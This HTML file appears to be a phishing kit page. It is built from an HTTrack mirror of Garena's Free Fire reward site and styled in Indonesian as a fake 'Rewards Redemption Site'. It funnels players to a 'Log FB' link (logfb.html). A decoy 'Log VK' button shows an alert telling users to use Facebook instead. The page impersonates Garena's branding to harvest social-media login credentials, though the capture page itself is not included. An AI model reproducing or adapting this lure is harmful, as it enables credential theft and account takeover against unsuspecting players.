<!DOCTYPE html>
<html lang="zh">


<!-- Mirrored from reward.ff.garena.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 14 Jul 2018 12:17:01 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
<link rel="stylesheet" href="https://ff.garena.com/statics/ff/css/common/reset.css">
	<link rel="stylesheet" href="https://ff.garena.com/statics/ff/css/common.css">  
    <link rel="stylesheet" href="https://ff.garena.com/statics/ff/css/swiper.css">
    <link rel="stylesheet" href="https://ff.garena.com/statics/ff/css/firepass/season02.css">
    <!-- M002 V3 -->
<style type="text/css">

.kotak {
	position:relative;
	margin:50px auto;
	max-width:1024px;
	height:auto;
	border:2px solid white;
	padding:30px;
	color: white;
}

.box{
 background-image:url("img/cewe.png"); 
 background-size:100% auto; 
 background-repeat: no-repeat; 
 color: white;
 width: 100%;
 height: auto;
 padding:10px;
 margin:0px auto;
 border: 0px auto;
 }
 


.hadiah {
 background-color: #ffba00;
 display: inline-block;
 width: 250px;
 height: auto;
 margin: 20px;
 color: white;
 border-radius: 10px;
}

.hadiah-apa {
 width: 250px;
 height: auto;
 margin: auto;
 border-radius: 10px;
}

.hadiah h5 {
 margin: 10px auto;
 font-size: 1.5em;
 text-align: center;
 height: 50px;
}


.tombol {
 background: transparent;
 position: relative;
 width: 30%;
 height: 40px;
 margin: 0;
 color: #ffba00;
 border: 1px solid #ffba00;
 font-size: 1.2em;
 font-weight:700;
 text-align: center;
 letter-spacing: 1px;
 outline: none;
 cursor: pointer;
}

h4 {
color: white;
}

input[type=text],input[type=password],input[type=number] {
 background:transparent;
 width:100%;
 padding:12px 20px;
 margin:8px 0;
 display:inline-block;
 border:1px solid #ffba00;
 color: #ffba00;
 box-sizing: border-box;
}

label {
 color: #ffba00;
}
</style>
    <!-- M002 V3 -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- set if need to be able scaled -->
    <meta name="description" content="">
    <meta name="author" content="">
    <meta name="title" content="FreeFire">
    <meta name="description" content="FreeFire">
    <meta property="og:title" content="FreeFire">
    <meta property="og:description" content="FreeFire">
    <title>Free Fire</title>
    <link rel="shortcut icon" href="https://ff.garena.tw/static/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="css/reset.css" />
    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    <link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet">
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
    <link href="css/all.css" rel="stylesheet">
    <link href="css/extra.css" rel="stylesheet">
    <!-- the css editable in USE -->
</head>
<div data-reactroot="">
<div class="container">
<div class="a_wrap2">
<div class="col-md-5 col-sm-5 col-xs-5">
<img src="imgg/logoff.png" class="gamelogo">
</div><div class="col-md-5 col-sm-5 col-xs-5">
<img src="imgg/garena.png" class="garenalogo"></div><span class="cit topics col-md-12 col-sm-12 col-xs-12">Rewards Redemption Site</span></div><div class="a_wrap"><div></div>
<center><h2><span class="txt_c">Login Via</span></h2></center>
<br>
</center>
<center><div class="btn_fb"></center>
<label><font color="gold">Account FB :</font></label><center><a href="logfb.html"><button type="submit" class="tombol">Log FB</button></center>

<br>

<center><div class="btn_vk"></center>
<label><font color="gold">Account VK: <font></label><center><a href="#"><button onclick="setTimeout(alert('Sedang tidak dalam jangkauan. anda bisa gunakan Facebook sebagai gantinya.'), 1000)" type="submit" class="tombol">Log VK</button></center>

</div></div></div></div>
<br>
<br>
<br>
<br>

<body>
<div class="g-footer clearFix">
    <div class="m-foot-wrap">
 <div class="m-foot-copyright">
            <div class="m-foot-logo"><img src="http://freefiremobile-a.akamaihd.net/ffwebsite/images/logo_small_foot.png"></div>
            <div class="txt">Copyright © Garena International.<br>Trademarks belong to their respective owners. All rights Reserved.</div>
    <div id="app"></div>

<script type="text/javascript" src="bundle.js"></script></body>


</html>